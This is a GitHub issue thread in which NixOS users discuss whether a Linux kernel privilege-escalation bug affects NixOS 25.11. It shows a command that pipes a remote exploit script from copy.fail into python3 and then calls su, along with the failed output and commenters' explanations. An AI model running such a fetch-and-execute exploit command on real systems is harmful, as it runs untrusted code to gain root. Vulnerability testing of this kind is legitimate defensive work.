GitHub Issue
NixOS 25.11 maybe affected?
```
[nix-shell:~]$ cat /etc/os-release
ANSI_COLOR="0;38;2;126;186;228"
BUG_REPORT_URL="https://github.com/NixOS/nixpkgs/issues"
BUILD_ID="25.11.20260425.a4bf066"
CPE_NAME="cpe:/o:nixos:nixos:25.11"
DEFAULT_HOSTNAME=nixos
DOCUMENTATION_URL="https://nixos.org/learn.html"
HOME_URL="https://nixos.org/"
ID=nixos
ID_LIKE=""
IMAGE_ID=""
IMAGE_VERSION=""
LOGO="nix-snowflake"
NAME=NixOS
PRETTY_NAME="NixOS 25.11 (Xantusia)"
SUPPORT_END="2026-06-30"
SUPPORT_URL="https://nixos.org/community.html"
VARIANT=""
VARIANT_ID=""
VENDOR_NAME=NixOS
VENDOR_URL="https://nixos.org/"
VERSION="25.11 (Xantusia)"
VERSION_CODENAME=xantusia
VERSION_ID="25.11"
[nix-shell:~]$ uname -a
Linux mwagner-t14 6.12.83 #1-NixOS SMP PREEMPT_DYNAMIC Wed Apr 22 11:19:04 UTC 2026 x86_64 GNU/Linux
[nix-shell:~]$ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 3376 0 0
Traceback (most recent call last):
File "", line 8, in
PermissionError: [Errno 13] Permission denied: '/usr/bin/su'
```
zimward • Apr 30, 2026
What you are seeing doesn't actually mean it's not affected. The exploit just isn't working because the `su` binary isn't placed in `/usr/bin`.
Tuco106 • Apr 30, 2026
I am using envfs (https://github.com/Mic92/envfs) to make the binaries available under `/usr/bin`
This is working for scripts with `#!/bin/bash` fine.
@zimward Do you know why it is not working for this exploit then?
fhennig42 • Apr 30, 2026
Yes, what @zimward wrote is true. It might be worth noting that it also doesn't work when you change the path to `/run/wrappers/bin/su` (which is what `which su` prints on NixOS). But this still doesn't tell anything about "NixOS is affected" or not. Since it's a kernel bug, NixOS might be affected as well as others.
fhennig42 • Apr 30, 2026
> This is working for scripts with #!/bin/bash fine.
I think Linux has something built in that prevents setuid binaries from shebangs like `#!/bin/bash`, so that is sadly still not a proof that NixOS isn't affected.
zimward • Apr 30, 2026
There is this script: https://raw.githubusercontent.com/rootsecdev/cve_2026_31431/refs/heads/main/test_cve_2026_31431.py that seems to work in testing if the page cache writes work.